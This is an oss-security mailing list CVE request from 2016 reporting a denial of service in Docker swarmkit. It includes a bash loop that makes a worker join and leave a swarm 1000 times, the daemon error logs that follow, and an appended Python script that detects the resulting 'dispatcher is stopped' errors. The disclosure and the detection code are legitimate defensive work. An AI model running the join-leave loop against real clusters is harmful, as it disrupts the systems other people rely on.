List: oss-security
Subject: [oss-security] cve request: docker swarmkit Dos occurs by repeatly joining and quitting swam cluster
From: Kaixiang Zhang <zhangkaixiang () 360 ! cn>
Date: 2016-07-29 9:47:31
Message-ID: 5EDB84F4B23F5B4DB6500A89258280E0BD067A () EX02 ! corp ! qihoo ! net
Docker swarmkit is used to form a swarm, coordinating tasks. Once a machine joins, it becomes a
Swarm Node. Nodes can either be worker nodes or manager nodes. I found a vulnerability in the
latest version of docker which could cause a Denial of Service: a machine cannot join the swarm
cluster after another node has repeatedly joined and quit the swarm many times (taking my testing
as an example, it needs at least one thousand times). Moreover, the docker debugging info
indicates the Dispatcher is stopped and the CA server may sometimes have exited.
# docker version
Client:
Version: 1.12.0-dev
API version: 1.25
Go version: go1.6.3
Git commit: 9c1be54-unsupported
Built: Fri Jul 29 15:40:52 2016
OS/Arch: linux/amd64
Server:
Version: 1.12.0-dev
API version: 1.25
Go version: go1.6.3
Git commit: 9c1be54-unsupported
Built: Fri Jul 29 15:40:52 2016
OS/Arch: linux/amd64
# docker swarm init
Swarm initialized: current node (23m6ksr96whsvuo8lzokenju3) is now a manager.
To add a worker to this swarm, run the following command:
docker swarm join \
--token SWMTKN-1-30f6ibzpscqh05qqdog85ktr8ptcw7ttn4wy5cwixy1wfchhb9-aljewtdn5727g1pldxnevjh51 \
xx.xx.xx.xx:2377
To add a manager to this swarm, run the following command:
docker swarm join \
--token SWMTKN-1-30f6ibzpscqh05qqdog85ktr8ptcw7ttn4wy5cwixy1wfchhb9-0p086z2sdbnpvognjmu76gpi6 \
xx.xx.xx.xx:2377
Log in to machine A1, join the swarm, and then quit the swarm.
-----------------------------------------------------
# docker swarm join --token \
SWMTKN-1-30f6ibzpscqh05qqdog85ktr8ptcw7ttn4wy5cwixy1wfchhb9-aljewtdn5727g1pldxnevjh51 \
xx.xx.xx.xx:2377
This node joined a swarm as a worker.
# docker swarm leave --force
Node left the swarm.
Log in to machine A2 and repeatedly join and quit the swarm 1000 times.
-----------------------------------------------------
# for i in {1..1000}; do docker swarm leave --force ; docker swarm join --token \
SWMTKN-1-30f6ibzpscqh05qqdog85ktr8ptcw7ttn4wy5cwixy1wfchhb9-aljewtdn5727g1pldxnevjh51 \
xx.xx.xx.xx:2377 ;done
This node joined a swarm as a worker.
Node left the swarm.
This node joined a swarm as a worker.
Node left the swarm.
This node joined a swarm as a worker.
Node left the swarm.
This node joined a swarm as a worker.
Node left the swarm.
This node joined a swarm as a worker.
Node left the swarm.
After finishing that, I logged in to machine A1 again and attempted to join the swarm; it failed.
--------------------------------------------------------
# docker swarm join --token \
SWMTKN-1-30f6ibzpscqh05qqdog85ktr8ptcw7ttn4wy5cwixy1wfchhb9-aljewtdn5727g1pldxnevjh51 \
xx.xx.xx.xx:2377
Error response from daemon: Timeout was reached before node was joined. Attempt to join the cluster will continue in the background. Use "docker info" command to see the current swarm status of your node.
Some debugging information from the docker daemon:
---------------------------------------------------------
time="2016-07-29T15:24:02.374560815+08:00" level=error msg="failed to remove node" error="rpc error: code = 10 desc = dispatcher is stopped" method="(*Dispatcher).Session" node.id=b11ta5p8g2wgy10vyzgsi6ocm node.session=1aph8scsewn89j3h5o3emgdql
time="2016-07-29T15:24:02.374604898+08:00" level=error msg=" session failed" error="rpc error: code = 1 desc = context canceled" module=agent
time="2016-07-29T15:24:14.069347074+08:00" level=debug msg="heartbeat expiration"
time="2016-07-29T15:24:14.069428834+08:00" level=error msg="failed deregistering node after heartbeat expiration" error="rpc error: code = 10 desc = dispatcher is stopped"
… …
Please assign CVE IDs for the security issue.
Best regards,
Kaixiang Zhang of the Cloud Security Team, Qihoo 360
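
A defender-side check for the symptom reported above, added here as an example and not part of the original message or of Docker's code: it parses daemon log lines in the key=value format quoted in the message and summarises the "dispatcher is stopped" errors. The function names and the summary layout are assumptions of this example; the sample lines are the four log entries from the message, one per line.

```python
import re
from collections import Counter

# key=value or key="quoted value" pairs, the format of the daemon log quoted above
PAIR = re.compile(r'([\w.]+)=(?:"((?:[^"\\]|\\.)*)"|(\S+))')
# gRPC status embedded in the error field: "rpc error: code = N desc = TEXT"
RPC = re.compile(r'rpc error: code = (\d+) desc = (.*)')
MARKER = "dispatcher is stopped"  # description seen in the report's log

def parse_line(line):
    """Split one log line into a dict of its fields (hypothetical helper)."""
    fields = {}
    for m in PAIR.finditer(line):
        fields[m.group(1)] = m.group(2) if m.group(2) is not None else m.group(3)
    return fields

def dispatcher_failures(lines):
    """Summarise error entries whose gRPC description is the stopped-dispatcher marker."""
    hits = []
    for fields in map(parse_line, lines):
        rpc = RPC.search(fields.get("error", ""))
        if fields.get("level") == "error" and rpc and rpc.group(2) == MARKER:
            hits.append(dict(fields, grpc_code=int(rpc.group(1))))
    return {
        "count": len(hits),
        "first": hits[0].get("time") if hits else None,
        "last": hits[-1].get("time") if hits else None,
        "grpc_codes": sorted({h["grpc_code"] for h in hits}),
        "by_msg": dict(Counter(h.get("msg", "") for h in hits)),
        "nodes": sorted({h["node.id"] for h in hits if "node.id" in h}),
    }

# The four log entries from the message above, one entry per line.
SAMPLE = [
    'time="2016-07-29T15:24:02.374560815+08:00" level=error msg="failed to remove node" error="rpc error: code = 10 desc = dispatcher is stopped" method="(*Dispatcher).Session" node.id=b11ta5p8g2wgy10vyzgsi6ocm node.session=1aph8scsewn89j3h5o3emgdql',
    'time="2016-07-29T15:24:02.374604898+08:00" level=error msg=" session failed" error="rpc error: code = 1 desc = context canceled" module=agent',
    'time="2016-07-29T15:24:14.069347074+08:00" level=debug msg="heartbeat expiration"',
    'time="2016-07-29T15:24:14.069428834+08:00" level=error msg="failed deregistering node after heartbeat expiration" error="rpc error: code = 10 desc = dispatcher is stopped"',
]

if __name__ == "__main__":
    for key, value in dispatcher_failures(SAMPLE).items():
        print(f"{key}: {value}")
```

A non-zero count on a manager, together with workers timing out on join, matches the state described in the report.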